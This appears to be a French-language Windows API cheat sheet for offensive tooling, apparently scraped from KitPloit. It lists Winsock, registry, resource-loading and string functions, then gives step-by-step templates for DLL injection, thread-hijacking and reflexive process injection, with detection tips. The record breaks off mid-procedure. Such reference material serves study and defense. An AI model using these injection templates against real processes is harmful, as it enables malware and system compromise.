WSARecv```c int WSARecv( SOCKET s, // Descriptor identifying a connected socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a connected socket, and can also be used for both synchronous and asynchronous data transfer.

root@kitploit:~
[WSASendTo](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasendto)```c
int WSASendTo(
    SOCKET s, // Descriptor identifying a socket.
    LPWSABUF lpBuffers, // Array of buffers containing the data to be sent.
    DWORD dwBufferCount, // Number of buffers in the lpBuffers array.
    LPDWORD lpNumberOfBytesSent, // Pointer to the number of bytes sent by this function call.
    DWORD dwFlags, // Flags to modify the behavior of the function call.
    const struct sockaddr* lpTo, // Pointer to the sockaddr structure for the target address.
    int iToLen, // Size of the address in lpTo.
    LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations.
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the send operation has been completed.
); // Sends data to a specific destination, for use with connection - less socket types such as SOCK_DGRAM.

WSARecvFrom```c int WSARecvFrom( SOCKET s, // Descriptor identifying a socket. LPWSABUF lpBuffers, // Array of buffers to receive the incoming data. DWORD dwBufferCount, // Number of buffers in the lpBuffers array. LPDWORD lpNumberOfBytesRecvd, // Pointer to the number of bytes received by this function call. LPDWORD lpFlags, // Flags to modify the behavior of the function call. struct sockaddr* lpFrom, // Pointer to an address structure that will receive the source address upon completion of the operation. LPINT lpFromlen, // Pointer to the size of the lpFrom address structure. LPWSAOVERLAPPED lpOverlapped, // Pointer to an overlapped structure for asynchronous operations. LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine // Pointer to the completion routine called when the receive operation has been completed. ); //Receives data from a specific source, used with connection - less socket types such as SOCK_DGRAM.

root@kitploit:~
[WSAAsyncSelect](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaasyncselect)```c
int WSAAsyncSelect(
    SOCKET s, // Descriptor identifying the socket.
    HWND hWnd, // Handle to the window which should receive the message.
    unsigned int wMsg, // Message to be received when an event occurs.
    long lEvent // Bitmask specifying a group of conditions to be monitored.
); // Requests Windows message - based notification of network events for a socket.

socket```c SOCKET socket( int af, int type, int protocol ); // Creates a new socket for network communication.

root@kitploit:~
[bind](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-bind)```c
int bind(
    SOCKET s, 
    const struct sockaddr *name, 
    int namelen
); // Binds a socket to a specific local address and port.

listen```c int listen( SOCKET s, int backlog ); // Sets a socket to listen for incoming connections.

root@kitploit:~
[accept](https://learn.microsoft.com/en-us/windows/win32/api/Winsock2/nf-winsock2-accept)```c
SOCKET accept(
    SOCKET s, 
    struct sockaddr *addr, 
    int *addrlen
); // Accepts a new incoming connection on a listening socket.

connect```c int connect( SOCKET s, const struct sockaddr *name, int namelen ); // Initiates a connection on a socket to a remote address.

root@kitploit:~
[send](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-send)```c
int send(
    SOCKET s, 
    const char *buf, 
    int len, 
    int flags
); // Sends data on a connected socket.

recv```c int recv( SOCKET s, char *buf, int len, int flags ); // Receives data from a connected socket.

root@kitploit:~
[closesocket](https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-closesocket)```c
int closesocket(
    SOCKET s
); //Closes a socket and frees its resources.

gethostbyname```c hostent* gethostbyname( const char* name // either a hostname or an IPv4 address in dotted-decimal notation ); // returns a pointer to a hostent struct. NOTE: Typically better to use getaddrinfo

root@kitploit:~
### Opérations du registre
[RegOpenKeyExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw)```c
LONG RegOpenKeyExW(
    HKEY hKey, 
    LPCWTSTR lpSubKey, 
    DWORD ulOptions, 
    REGSAM samDesired, 
    PHKEY phkResult
); // Opens the specified registry key.

RegQueryValueExW```c LONG RegQueryValueExW( HKEY hKey, LPCWTSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData ); // Retrieves the type and data of the specified value name associated with an open registry key.

root@kitploit:~
[RegSetValueExW](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexw)```c
LONG RegSetValueEx(
    HKEY hKey, 
    LPCWTSTR lpValueName, 
    DWORD Reserved, 
    DWORD dwType, 
    const BYTE *lpData, 
    DWORD cbData
); // Sets the data and type of the specified value name associated with an open registry key.

RegCloseKey```c LONG RegCloseKey( HKEY hKey ); // Closes a handle to the specified registry key.

root@kitploit:~
[RegCreateKeyExA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa)```c
LSTATUS RegCreateKeyExA(
  [in]            HKEY                        hKey,
  [in]            LPCSTR                      lpSubKey,
                  DWORD                       Reserved,
  [in, optional]  LPSTR                       lpClass,
  [in]            DWORD                       dwOptions,
  [in]            REGSAM                      samDesired,
  [in, optional]  const LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [out]           PHKEY                       phkResult,
  [out, optional] LPDWORD                     lpdwDisposition
); // Creates the specified registry key. If the key already exists, the function opens it. Note that key names are not case sensitive. 

RegSetValueExA```c LSTATUS RegSetValueExA( [in] HKEY hKey, [in, optional] LPCSTR lpValueName, DWORD Reserved, [in] DWORD dwType, [in] const BYTE *lpData, [in] DWORD cbData ); // Sets the data and type of a specified value under a registry key.

root@kitploit:~
[RegCreateKeyA](https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeya)```c
LSTATUS RegCreateKeyA(
  [in]           HKEY   hKey,
  [in, optional] LPCSTR lpSubKey,
  [out]          PHKEY  phkResult
); // Creates the specified registry key. If the key already exists in the registry, the function opens it.

RegDeleteKeyA```c LSTATUS RegDeleteKeyA( [in] HKEY hKey, [in] LPCSTR lpSubKey ); // Deletes a subkey and its values. Note that key names are not case sensitive.

root@kitploit:~
[NtRenameKey](https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntrenamekey)```c
__kernel_entry NTSTATUS NtRenameKey(
  [in] HANDLE          KeyHandle,
  [in] PUNICODE_STRING NewName
); // Changes the name of the specified registry key.

Gestion des erreurs

WSAGetLastError```c int WSAGetLastError( void ); // Returns the error status for the last Windows Sockets operation that failed.

root@kitploit:~
[WSASetLastError](https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsasetlasterror)```c
void WSASetLastError(
    int iError
); // Sets the error status for the last Windows Sockets operation.

WSAGetOverlappedResult```c BOOL WSAGetOverlappedResult( SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags ); // Determines the results of an overlapped operation on the specified socket.

root@kitploit:~
[WSAIoctl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaioctl)```c
int WSAIoctl(
    SOCKET s, 
    DWORD dwIoControlCode, 
    LPVOID lpvInBuffer, 
    DWORD cbInBuffer, 
    LPVOID lpvOutBuffer, 
    DWORD cbOutBuffer, 
    LPDWORD lpcbBytesReturned, 
    LPWSAOVERLAPPED lpOverlapped, 
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
); // Controls the mode of a socket.

WSACreateEvent```c WSAEVENT WSACreateEvent( void ); // Creates a new event object.

root@kitploit:~
[WSASetEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasetevent)```c
BOOL WSASetEvent(
    WSAEVENT hEvent
); // Sets the state of the specified event object to signaled.

WSAResetEvent```c BOOL WSAResetEvent( WSAEVENT hEvent ); // Sets the state of the specified event object to nonsignaled.

root@kitploit:~
[WSACloseEvent](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsacloseevent)```c
BOOL WSACloseEvent(
    WSAEVENT hEvent
); // Closes an open event object handle.

WSAWaitForMultipleEvents```c DWORD WSAWaitForMultipleEvents( DWORD cEvents, const WSAEVENT *lphEvents, BOOL fWaitAll, DWORD dwTimeout, BOOL fAlertable ); // Waits for multiple event objects and returns when the specified events are signaled or the time-out interval elapses.

root@kitploit:~
### Gestion des ressources
[FindResource](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea)```c
HRSRC FindResource(
  [in, optional] HMODULE hModule,   // A handle to the module whose portable executable file or an accompanying MUI file contains the resource. If this parameter is NULL, the function searches the module used to create the current process.
  [in]           LPCSTR  lpName,    // The name of the resource.
  [in]           LPCSTR  lpType     // The resource type.
); // Determines the location of a resource with the specified type and name in the specified module.
root@kitploit:~
HRSRC res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);

LoadResource```c HGLOBAL LoadResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource. [in] HRSRC hResInfo // A handle to the resource to be loaded. ); // Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.

root@kitploit:~
```c
HGLOBAL resHandle = resHandle = LoadResource(NULL, res);

LockResource```c LPVOID LockResource( [in] HGLOBAL hResData // A handle to the resource to be accessed ); // Retrieves a pointer to the specified resource in memory.

root@kitploit:~
```c
unsigned char * payload = (char *) LockResource(resHandle);

SizeofResource```c DWORD SizeofResource( [in, optional] HMODULE hModule, // A handle to the module whose executable file contains the resource [in] HRSRC hResInfo // A handle to the resource. This handle must be created by using FindResource ); // Retrieves the size, in bytes, of the specified resource.

root@kitploit:~
```c
unsigned int payload_len = SizeofResource(NULL, res);

Fonctions de chaînes Unicode```c

#include <wchar.h> // for wide character string routines

root@kitploit:~
### Longueur de chaîne```c
size_t wcslen(
    const wchar_t *str
); // Returns the length of the given wide string.

Copie de chaîne

[wcscpy]```c wchar_t *wcscpy( wchar_t *dest, const wchar_t *src ); // Copies the wide string from src to dest.

root@kitploit:~
[wcsncpy]```c
wchar_t *wcsncpy(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Copies at most count characters from the wide string src to dest.

Concaténation de chaînes

[wcscat]```c wchar_t *wcscat( wchar_t *dest, const wchar_t *src ); // Appends the wide string src to the end of the wide string dest.

root@kitploit:~
[wcsncat]```c
wchar_t *wcsncat(
    wchar_t *dest, 
    const wchar_t *src, 
    size_t count
); // Appends at most count characters from the wide string src to the end of the wide string dest.

Comparaison de chaînes

[wcscmp]```c int wcscmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically.

root@kitploit:~
[wcsncmp]```c
int wcsncmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically.

[_wcsicmp]```c int _wcsicmp( const wchar_t *str1, const wchar_t *str2 ); // Compares two wide strings lexicographically, ignoring case.

root@kitploit:~
[_wcsnicmp]```c
int _wcsnicmp(
    const wchar_t *str1, 
    const wchar_t *str2, 
    size_t count
); // Compares up to count characters of two wide strings lexicographically, ignoring case.

Recherche de chaîne

[wcschr]```c wchar_t *wcschr( const wchar_t *str, wchar_t c ); // Finds the first occurrence of the wide character c in the wide string str.

root@kitploit:~
[wcsrchr]```c
wchar_t *wcsrchr(
    const wchar_t *str, 
    wchar_t c
); // Finds the last occurrence of the wide character c in the wide string str.

[wcspbrk]```c wchar_t *wcspbrk( const wchar_t *str1, const wchar_t *str2 ); // Finds the first occurrence in the wide string str1 of any character from the wide string str2.

root@kitploit:~
[wcsstr]```c
wchar_t *wcsstr(
    const wchar_t *str1, 
    const wchar_t *str2
); // Finds the first occurrence of the wide string str2 in the wide string str1.

[wcstok]```c wchar_t *wcstok( wchar_t *str, const wchar_t *delimiters ); // Splits the wide string str into tokens based on the delimiters.

root@kitploit:~
### Classification et conversion des caractères
[towupper]```c
wint_t towupper(
    wint_t c
); // Converts a wide character to uppercase.

[towlower]```c wint_t towlower( wint_t c ); // Converts a wide character to lowercase.

root@kitploit:~
[iswalpha]```c
int iswalpha(
    wint_t c
); // Checks if the wide character is an alphabetic character.

[iswdigit]```c int iswdigit( wint_t c ); // Checks if the wide character is a decimal digit.

root@kitploit:~
[iswalnum]```c
int iswalnum(
    wint_t c
); // Checks if the wide character is an alphanumeric character.

[iswspace]```c int iswspace( wint_t c ); // Checks if the wide character is a whitespace character.

root@kitploit:~
[iswxdigit]```c
int iswxdigit(
    wint_t c
); // Checks if the wide character is a valid hexadecimal digit.

Aide-mémoire des structures Win32

Structures courantes

SYSTEM_INFO```cpp #include <sysinfoapi.h> // Contains information about the current computer system, including the architecture and type of the processor, the number of processors, and the page size. typedef struct _SYSTEM_INFO { union { DWORD dwOemId; struct { WORD wProcessorArchitecture; WORD wReserved; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; DWORD dwPageSize; LPVOID lpMinimumApplicationAddress; LPVOID lpMaximumApplicationAddress; DWORD_PTR dwActiveProcessorMask; DWORD dwNumberOfProcessors; DWORD dwProcessorType; DWORD dwAllocationGranularity; WORD wProcessorLevel; WORD wProcessorRevision; } SYSTEM_INFO;

root@kitploit:~
[**`FILETIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime)```cpp
#include <minwinbase.h>
// Represents the number of 100-nanosecond intervals since January 1, 1601 (UTC). Used for file and system time.
typedef struct _FILETIME {
    DWORD dwLowDateTime;
    DWORD dwHighDateTime;
} FILETIME;

STARTUPINFO```cpp #include <processthreadsapi.h> // Specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time. typedef struct _STARTUPINFOA { DWORD cb; LPSTR lpReserved; LPSTR lpDesktop; LPSTR lpTitle; DWORD dwX; DWORD dwY; DWORD dwXSize; DWORD dwYSize; DWORD dwXCountChars; DWORD dwYCountChars; DWORD dwFillAttribute; DWORD dwFlags; WORD wShowWindow; WORD cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; } STARTUPINFOA, *LPSTARTUPINFOA;

root@kitploit:~
[**`PROCESS_INFORMATION`**](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-process_information)```cpp
#include <processthreadsapi.h>
// Contains information about a newly created process and its primary thread.
typedef struct _PROCESS_INFORMATION {
    HANDLE hProcess;
    HANDLE hThread;
    DWORD  dwProcessId;
    DWORD  dwThreadId;
} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;

PROCESSENTRY32```c #include <tlhelp32.h> typedef struct tagPROCESSENTRY32 { DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; ULONG_PTR th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; CHAR szExeFile[MAX_PATH]; } PROCESSENTRY32;

root@kitploit:~
[**`SECURITY_ATTRIBUTES`**](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85))```cpp
// Determines whether the handle can be inherited by child processes and specifies a security descriptor for a new object.
typedef struct _SECURITY_ATTRIBUTES {
    DWORD  nLength;
    LPVOID lpSecurityDescriptor;
    BOOL   bInheritHandle;
} SECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

OVERLAPPED```cpp #inluce <minwinbase.h> // Contains information used in asynchronous (also known as overlapped) input and output (I/O) operations. typedef struct _OVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; } DUMMYSTRUCTNAME; PVOID Pointer; } DUMMYUNIONNAME; HANDLE hEvent; } OVERLAPPED, *LPOVERLAPPED;

root@kitploit:~
[**`GUID`**](https://docs.microsoft.com/en-us/windows/win32/api/guiddef/ns-guiddef-guid)```cpp
#include <guiddef.h>
// Represents a globally unique identifier (GUID), used to identify objects, interfaces, and other items.
typedef struct _GUID {
    unsigned long  Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[8];
} GUID;

MEMORY_BASIC_INFORMATION```cpp #include <winnt.h> // Contains information about a range of pages in the virtual address space of a process. typedef struct _MEMORY_BASIC_INFORMATION { PVOID BaseAddress; PVOID AllocationBase; DWORD AllocationProtect; SIZE_T RegionSize; DWORD State; DWORD Protect; DWORD Type; } MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;

root@kitploit:~
[**`SYSTEMTIME`**](https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-systemtime)```cpp
#include <minwinbase.h>
// Specifies a date and time, using individual members for the month, day, year, weekday, hour, minute, second, and millisecond.
typedef struct _SYSTEMTIME {
    WORD wYear;
    WORD wMonth;
    WORD wDayOfWeek;
    WORD wDay;
    WORD wHour;
    WORD wMinute;
    WORD wSecond;
    WORD wMilliseconds;
} SYSTEMTIME, *PSYSTEMTIME, *LPSYSTEMTIME;

COORD```cpp // Defines the coordinates of a character cell in a console screen buffer, where the origin (0,0) is at the top-left corner. typedef struct _COORD { SHORT X; SHORT Y; } COORD, *PCOORD;

root@kitploit:~
[**`SMALL_RECT`**](https://docs.microsoft.com/en-us/windows/console/small-rect-str)```cpp
//  Defines the coordinates of the upper left and lower right corners of a rectangle.
typedef struct _SMALL_RECT {
    SHORT Left;
    SHORT Top;
    SHORT Right;
    SHORT Bottom;
} SMALL_RECT;

CONSOLE_SCREEN_BUFFER_INFO```cpp // Contains information about a console screen buffer. typedef struct _CONSOLE_SCREEN_BUFFER_INFO { COORD dwSize; COORD dwCursorPosition; WORD wAttributes; SMALL_RECT srWindow; COORD dwMaximumWindowSize; } CONSOLE_SCREEN_BUFFER_INFO, *PCONSOLE_SCREEN_BUFFER_INFO;

root@kitploit:~
[**`WSADATA`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata)```cpp
#include <winsock.h>
// Contains information about the Windows Sockets implementation.
typedef struct WSAData {
    WORD           wVersion;
    WORD           wHighVersion;
    unsigned short iMaxSockets;
    unsigned short iMaxUdpDg;
    char FAR       *lpVendorInfo;
    char           szDescription[WSADESCRIPTION_LEN+1];
    char           szSystemStatus[WSASYS_STATUS_LEN+1];
} WSADATA, *LPWSADATA;

[CRITICAL_SECTION](struct RTL_CRITICAL_SECTION (nirsoft.net))```c++ // Represents a critical section object, which is used to provide synchronization access to a shared resource. typedef struct _RTL_CRITICAL_SECTION { PRTL_CRITICAL_SECTION_DEBUG DebugInfo; LONG LockCount; LONG RecursionCount; HANDLE OwningThread; HANDLE LockSemaphore; ULONG_PTR SpinCount; } RTL_CRITICAL_SECTION, *PRTL_CRITICAL_SECTION;

root@kitploit:~
[**`WSAPROTOCOL_INFO`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/ns-winsock2-wsaprotocol_infoa)```c++
#include <winsock2.h>
// Contains Windows Sockets protocol information.
typedef struct _WSAPROTOCOL_INFOA {
    DWORD          dwServiceFlags1;
    DWORD          dwServiceFlags2;
    DWORD          dwServiceFlags3;
    DWORD          dwServiceFlags4;
    DWORD          dwProviderFlags;
    GUID           ProviderId;
    DWORD          dwCatalogEntryId;
    WSAPROTOCOLCHAIN ProtocolChain;
    int            iVersion;
    int            iAddressFamily;
    int            iMaxSockAddr;
    int            iMinSockAddr;
    int            iSocketType;
    int            iProtocol;
    int            iProtocolMaxOffset;
    int            iNetworkByteOrder;
    int            iSecurityScheme;
    DWORD          dwMessageSize;
    DWORD          dwProviderReserved;
    CHAR           szProtocol[WSAPROTOCOL_LEN+1];
} WSAPROTOCOL_INFOA, *LPWSAPROTOCOL_INFOA;

MSGHDR```c++ #include <ws2def.h> // Contains message information for use with the sendmsg and recvmsg functions. typedef struct _WSAMSG { LPSOCKADDR name; INT namelen; LPWSABUF lpBuffers; ULONG dwBufferCount; WSABUF Control; ULONG dwFlags; } WSAMSG, *PWSAMSG, *LPWSAMSG;

root@kitploit:~
### Aide-mémoire des structures de sockets Win32 (winsock.h)
[**`SOCKADDR`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-sockaddr)```cpp
// A generic socket address structure used for compatibility with various address families.
typedef struct sockaddr {
    u_short sa_family;
    char    sa_data[14];
} SOCKADDR, *PSOCKADDR, *LPSOCKADDR;

SOCKADDR_IN```cpp // Represents an IPv4 socket address, containing the IPv4 address, port number, and address family. typedef struct sockaddr_in { short sin_family; u_short sin_port; struct in_addr sin_addr; char sin_zero[8]; } SOCKADDR_IN, *PSOCKADDR_IN, *LPSOCKADDR_IN;

root@kitploit:~
[**`LINGER`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-linger)```cpp
// Used to set the socket option SO_LINGER, which determines the action taken when unsent data is queued on a socket and a `closesocket` is performed.
typedef struct linger {
    u_short l_onoff;
    u_short l_linger;
} LINGER, *PLINGER, *LPLINGER;

TIMEVAL```cpp // Represents a time interval, used with the select function to specify a timeout period. typedef struct timeval { long tv_sec; long tv_usec; } TIMEVAL, *PTIMEVAL, *LPTIMEVAL;

root@kitploit:~
[**`FD_SET`**](https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-fd_set)```cpp
// Represents a set of sockets used with the `select` function to check for socket events.
typedef struct fd_set {
    u_int fd_count;
    SOCKET fd_array[FD_SETSIZE];
} fd_set, *Pfd_set, *LPfd_set;

Aide-mémoire des structures de sockets Win32 (winsock2.h)

IN_ADDR```cpp // Represents an IPv4 address. typedef struct in_addr { union { struct { u_char s_b1, s_b2, s_b3, s_b4; } S_un_b; struct { u_short s_w1, s_w2; } S_un_w; u_long S_addr; } S_un; } IN_ADDR, *PIN_ADDR, *LPIN_ADDR;

root@kitploit:~
### Aide-mémoire des structures de sockets Win32 (ws2def.h)
[**`ADDRINFO`**](https://learn.microsoft.com/en-us/windows/win32/api/ws2def/ns-ws2def-addrinfow)```cpp
#include <ws2def.h>
// Contains information about an address for use with the `getaddrinfo` function, and is used to build a linked list of addresses.
typedef struct addrinfoW {
    int             ai_flags;
    int             ai_family;
    int             ai_socktype;
    int             ai_protocol;
    size_t          ai_addrlen;
    PWSTR           *ai_canonname;
    struct sockaddr *ai_addr;
    struct addrinfo *ai_next;
} ADDRINFOW, *PADDRINFOW;

WSABUF```cpp #include <ws2def.h> // Contains a pointer to a buffer and its length. Used for scatter/gather I/O operations. typedef struct _WSABUF { ULONG len; __field_bcount(len) CHAR FAR *buf; } WSABUF, FAR * LPWSABUF;

root@kitploit:~
[**`SOCKADDR_IN6`**](https://docs.microsoft.com/en-us/windows/win32/api/ws2ipdef/ns-ws2ipdef-sockaddr_in6)```cpp
#include <ws2ipdef.h>
// Represents an IPv6 socket address, containing the IPv6 address, port number, flow info, and address family.
typedef struct sockaddr_in6 {
    short          sin6_family;
    u_short        sin6_port;
    u_long         sin6_flowinfo;
    struct in6_addr sin6_addr;
    u_long         sin6_scope_id;
} SOCKADDR_IN6, *PSOCKADDR_IN6, *LPSOCKADDR_IN6;

IN6_ADDR```cpp #include <in6addr.h> // Represents an IPv6 address. typedef struct in6_addr { union { u_char Byte[16]; u_short Word[8]; } u; } IN6_ADDR, *PIN6_ADDR, *LPIN6_ADDR;

root@kitploit:~
# Techniques d'injection de code

## 1. Injection de DLL

Cette technique force un processus à charger une DLL malveillante.

API clés:
- [`OpenProcess`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess)  ```c
  HANDLE OpenProcess(
    DWORD dwDesiredAccess,
    BOOL  bInheritHandle,
    DWORD dwProcessId
  );

VirtualAllocEx ```c LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

root@kitploit:~
- [`WriteProcessMemory`](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)  ```c
BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • CreateRemoteThread ```c HANDLE CreateRemoteThread( HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId );
    root@kitploit:~
  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • LoadLibrary ```c HMODULE LoadLibraryA( LPCSTR lpLibFileName );
    root@kitploit:~
  • NtCreateThread (Non documenté) ```c NTSTATUS NTAPI NtCreateThread( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, OUT PCLIENT_ID ClientId, IN PCONTEXT ThreadContext, IN PINITIAL_TEB InitialTeb, IN BOOLEAN CreateSuspended );
    root@kitploit:~
  • RtlCreateUserThread (Non documenté) ```c NTSTATUS NTAPI RtlCreateUserThread( IN HANDLE ProcessHandle, IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, IN BOOLEAN CreateSuspended, IN ULONG StackZeroBits, IN OUT PULONG StackReserved, IN OUT PULONG StackCommit, IN PVOID StartAddress, IN PVOID StartParameter OPTIONAL, OUT PHANDLE ThreadHandle, OUT PCLIENT_ID ClientId );

Template :

  1. Ouvrez le processus cible avec OpenProcess
  2. Allouez de la mémoire dans le processus cible avec VirtualAllocEx
  3. Écrivez le chemin de la DLL dans la mémoire allouée avec WriteProcessMemory
  4. Obtenez l'adresse de LoadLibraryA à l'aide de GetProcAddress
  5. Créez un thread distant dans le processus cible avec CreateRemoteThread, pointant vers LoadLibraryA ; passez l'adresse de LoadLibraryA comme paramètre lpStartAddress.
  6. (Facultatif) Utilisez NtCreateThread ou RtlCreateUserThread pour des méthodes alternatives de création de threads

Détection et défense :

  • Surveillez les accès suspects aux processus et les modèles d'allocation mémoire
  • Utilisez la liste blanche d'applications pour empêcher le chargement de DLL non autorisées
  • Implémentez des contrôles d'intégrité des processus
  • Utilisez des outils comme Process Monitor de Microsoft pour détecter les tentatives d'injection de DLL

2. Injection PE

Cette technique consiste à écrire et à exécuter du code malveillant dans un processus distant ou dans le même processus (auto-injection).

API clés :

  • OpenThread ```c HANDLE OpenThread( DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId );
    root@kitploit:~

SuspendThread ```c DWORD SuspendThread( HANDLE hThread );

root@kitploit:~
- `VirtualAllocEx` (voir ci-dessus)
- `WriteProcessMemory` (voir ci-dessus)
- [`SetThreadContext`](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext)  ```c
BOOL SetThreadContext(
  HANDLE        hThread,
  const CONTEXT *lpContext
);

ResumeThread ```c DWORD ResumeThread( HANDLE hThread );

root@kitploit:~
- `NtResumeThread` (Non documenté)  ```c
NTSTATUS NTAPI NtResumeThread(
  IN HANDLE ThreadHandle,
  OUT PULONG PreviousSuspendCount OPTIONAL
);

Modèle :

  1. Ouvrez le thread cible avec OpenThread
  2. Suspendez le thread avec SuspendThread
  3. Allouez de la mémoire dans le processus cible avec VirtualAllocEx
  4. Écrivez le code malveillant dans la mémoire allouée avec WriteProcessMemory
  5. Modifiez le contexte du thread pour pointer vers le code injecté avec SetThreadContext
  6. Reprenez le thread avec ResumeThread ou NtResumeThread

Détection et défense :

  • Surveillez les schémas inhabituels de suspension et de reprise de threads
  • Mettez en œuvre des contrôles d'intégrité de la mémoire
  • Utilisez des solutions de détection et de réponse aux points de terminaison (EDR) pour détecter les modifications suspectes de la mémoire
  • Employez des techniques d'analyse de la mémoire des processus en cours d'exécution

3. Injection réflexive

Similaire à l'injection PE mais évite d'utiliser LoadLibrary et CreateRemoteThread. Implique l'écriture d'un chargeur personnalisé capable de charger une DLL depuis la mémoire sans utiliser le chargeur Windows standard.

API clés :

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • OpenProcess (voir ci-dessus)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~
  • ZwMapViewOfSection (Documenté pour le mode noyau) ```c NTSTATUS ZwMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~
  • CreateThread (voir CreateRemoteThread ci-dessus)

Autres API parfois utilisées :

  • VirtualQueryEx ```c SIZE_T VirtualQueryEx( HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength );
    root@kitploit:~
  • ReadProcessMemory ```c BOOL ReadProcessMemory( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead );
    root@kitploit:~

Procédure :

  1. Créer un mappage de fichier de la DLL avec CreateFileMapping
  2. Mapper une vue du fichier avec MapViewOfFile
